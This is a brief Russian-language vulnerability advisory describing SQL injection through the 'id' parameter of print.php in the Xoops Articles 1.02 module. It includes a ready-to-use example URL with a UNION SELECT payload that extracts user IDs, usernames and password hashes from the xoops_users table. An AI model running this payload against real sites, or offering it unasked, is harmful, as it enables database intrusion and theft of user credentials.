Программа: Xoops module Articles 1.02

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL, NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/* */FROM/**/xoops_users/**/LIMIT/**/1,1/*



Оставить мнение